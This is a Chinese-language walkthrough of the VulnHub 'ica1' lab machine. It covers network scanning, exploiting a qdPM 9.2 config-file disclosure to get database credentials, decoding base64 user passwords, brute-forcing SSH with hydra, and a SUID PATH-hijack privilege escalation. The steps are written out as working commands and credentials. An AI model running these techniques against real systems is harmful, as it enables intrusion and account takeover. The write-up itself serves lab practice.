vulnhub ica1

搭建靶机跟之前一样

不过这个要修改一下网卡;下面链接有教程

vulnhub jangow靶机-CSDN博客

1.扫描靶机IP

arp-scan -l 
192.168.47.135

2.信息收集

nmap -sS 192.168.47.135

访问网站

这个是一个web应用，框架是qdpm 9.2
在kali上搜索一下发现有两个漏洞，依次看一下

searchsploit qdpm 9.2

1.locate 50854.txt

cat /usr/share/exploitdb/exploits/php/webapps/50854.txt

这个是一个csrf的html文件

2.50176.txt

数据库的密码和连接字符串存储在yml文件中。

访问地址:/core/config/databases.ym

3.漏洞利用

访问地址后下载下来一个文件

进行连接数据库，用户名qdpmadmin；密码：UcVQCMQk2STVeS6J

我们去连接数据库

mysql -u qdpmadmin -h 192.168.47.135 -p 

在staff这个数据库有三张表

#user表中都是用户名
Smith
ucas
Travis
Dexter
Meyer 

#login表中都是base64加密
c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ== 
#解密
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy

爆破一下靶机的ssh

user和passwd做成一个文件

hydra -L user -P passwd ssh://192.168.47.135

在这里用户名首字母都是大写;我们要给他换成小写;要不会爆不出来

使用ssh去连接;获取flag

4.提权

切换用户dexter

查看了一下note.txt

文件给了提示需要suid提权

#查找具有SetUID权限的文件的命令
find / -perm -4000 2>/dev/null

使用strings命令查看一下get_access

发现cat命令提权

配置环境变量

echo "/bin/bash" > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
ehco $PATH
/opt/get_access